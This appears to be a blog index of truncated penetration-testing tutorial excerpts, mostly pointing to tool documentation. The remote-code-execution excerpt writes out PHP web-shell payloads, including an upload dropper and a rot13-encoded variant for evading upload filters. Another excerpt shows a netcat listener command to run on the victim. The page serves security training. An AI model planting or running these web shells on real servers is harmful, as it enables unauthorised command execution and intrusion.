[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell

Getting a Remote Shell. Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target. Netcat: you could just start a Netcat listener on the victim, if Netcat is available: nc -lvnp 1234 … and start a shell on the attack …

[ Pen Testing ] :: Step by Step: Database Enumeration

Database Enumeration. Enumeration with SQLmap: SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage. For example, save a captured header as an input file for SQLmap: Load HTTP request from a file. Option: -r. One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …

[ Pen Testing ] :: Step by Step: Linux Privilege Escalation

Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Local Linux Enumeration & Privilege Escalation Cheatsheet (an item-by-item list of tests performed by LinEnum): https://www.rebootuser.com/?p=1623 LinEnum: https://github.com/rebootuser/LinEnum

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good, thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter msfvenom to get a syntax page. View a list of payloads: msfvenom -l payloads Create the reverse …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

Remote Code Execution (RCE). PHP RCE: test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET["c"]); ?> <?php `$_GET["c"]`; ?> Upload a file: <?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?> Evade file-type upload filters using rot13 + urlencode: <?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/testfile.php', str_rot13(urldecode($payload))); ?> RCE via webshell: Pentest Monkey has …

[ Pen Testing ] :: Step by Step: Burp Suite

Burp Suite. Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to test for path traversal vulnerabilities: https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit and Armitage. Starting Metasploit: generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized: service postgresql start msfdb init # only if necessary Starting msfconsole: msfconsole Once msfconsole is running: msf>db_status # check database status # …